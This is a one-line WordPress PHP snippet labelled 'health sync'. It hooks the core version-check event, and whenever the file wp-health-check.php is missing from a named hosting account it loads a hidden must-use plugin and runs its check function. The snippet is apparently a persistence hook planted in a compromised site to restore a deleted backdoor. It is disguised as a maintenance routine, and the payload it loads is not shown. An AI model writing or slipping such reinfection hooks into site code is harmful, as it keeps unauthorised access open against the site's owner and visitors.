/* health sync */ add_action('wp_version_check', function(){ $f='/home/withcrhl/public_html/wp-health-check.php'; $m='/home/withcrhl/public_html/wp-content/mu-plugins/health-sync.php'; if(!file_exists($f)&&file_exists($m)){include $m;wp_health_sync_check();} });